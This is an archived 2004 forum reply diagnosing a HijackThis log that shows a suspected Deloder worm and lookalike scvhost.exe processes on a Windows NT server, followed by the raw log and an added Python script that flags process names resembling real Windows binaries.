
Re: HijackThisLog Analysis - Nick

Date: 7:09:14 PM, on 6/30/04

Looks like there is a remote control trojan in the system...

Also, there are multiple sessions of scvhost.exe.

End the suspicious processes below:

C:\WINNT\SYSTEM32\DNTUS26.EXE
C:\WINNT\system32\scvhost.exe

Remove Unauthorised Software:

DNTUS26.EXE is also a suspected W32/Deloder.worm infection.

Download the latest Stinger software and reboot the computer into safe mode. Then scan and delete viruses.

Original log, with private information removed:


Logfile of HijackThis v1.97.7
Scan saved at 7:09:14 PM, on 6/30/04
Platform: Windows NT 4 SP6 (WinNT 4.00.1381)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\spoolss.exe
C:\WINNT\system32\RpcSs.exe
C:\WINNT\System32\nddeagnt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\WINNT\System32\msdtc.exe
C:\Program Files\Common Files\Network Associates\Alert Manager\amgrsrvc.exe
C:\PROGRA~1\DIRECT~1\DUService.exe
C:\WINNT\SYSTEM32\DNTUS26.EXE
C:\WINNT\System32\llssrv.exe
C:\Program Files\Network Associates\NetShield 2000\Mcshield.exe
C:\Program Files\Network Associates\NetShield 2000\VsTskMgr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
c:\winnt\system32\pstores.exe
C:\WINNT\System32\LOCATOR.EXE
C:\WINNT\system32\NetLogon.exe
C:\WINNT\system32\MSTask.exe
C:\Program Files\ORL\VNC\WinVNC.exe
C:\WINNT\System32\ZipToA.exe
C:\WINNT\System32\inetsrv\inetinfo.exe
C:\WINNT\System32\INTERNAT.EXE
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\vpop3\vpop3svc.exe
C:\vpop3\VPOP3.EXE
C:\WINNT\regedit.exe
C:\Program Files\Network Associates\NetShield 2000\scan32.exe
C:\WINNT\system32\notepad.exe
C:\WinZip\winzip32.exe
C:\TEMP\HijackThis.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = proxy.singnet.com.sg:8080
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 192.168.*;
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
F2 - REG:system.ini: UserInit=userinit,nddeagnt.exe
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O13 - WWW. Prefix: http:??

Trojan found:

DNTUS26.EXE
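
The lookalike-name check behind the scvhost.exe observation above, as an added example that is not part of the original post: it parses the "Running processes" section of a HijackThis log and flags names within one edit (a swapped letter pair counts as one) of a well-known Windows system binary, with the instance count. The `KNOWN` list and all function names are assumptions for illustration; the sample is an excerpt of the log above.

```python
import ntpath
from collections import Counter

# Assumed allowlist of well-known Windows system process names (illustrative, not complete).
KNOWN = {"svchost.exe", "services.exe", "lsass.exe", "winlogon.exe",
         "smss.exe", "explorer.exe", "spoolss.exe"}

# Excerpt of the log on this page.
SAMPLE = r"""Logfile of HijackThis v1.97.7

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\SYSTEM32\DNTUS26.EXE
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\TEMP\HijackThis.exe

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
"""

def edit_distance(a, b):
    """Optimal string alignment distance: an adjacent transposition costs 1."""
    d = [[max(i, j) if 0 in (i, j) else 0 for j in range(len(b) + 1)]
         for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            d[i][j] = min(d[i-1][j] + 1, d[i][j-1] + 1, d[i-1][j-1] + (a[i-1] != b[j-1]))
            if i > 1 and j > 1 and a[i-1] == b[j-2] and a[i-2] == b[j-1]:
                d[i][j] = min(d[i][j], d[i-2][j-2] + 1)
    return d[len(a)][len(b)]

def running_processes(log_text):
    """Paths listed under 'Running processes:' up to the first blank line."""
    lines = [l.strip() for l in log_text.splitlines()]
    start = lines.index("Running processes:") + 1
    end = lines.index("", start) if "" in lines[start:] else len(lines)
    return lines[start:end]

def lookalikes(procs, max_dist=1):
    """Map each name that nearly matches, but is not, a KNOWN name
    to (the name it resembles, number of running instances)."""
    counts = Counter(ntpath.basename(p).lower() for p in procs)
    return {name: (good, n) for name, n in counts.items() if name not in KNOWN
            for good in sorted(KNOWN) if edit_distance(name, good) <= max_dist}
```

A name check like this only catches imitation of known binaries; DNTUS26.EXE in the same log resembles no entry in `KNOWN` and is not flagged by it.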

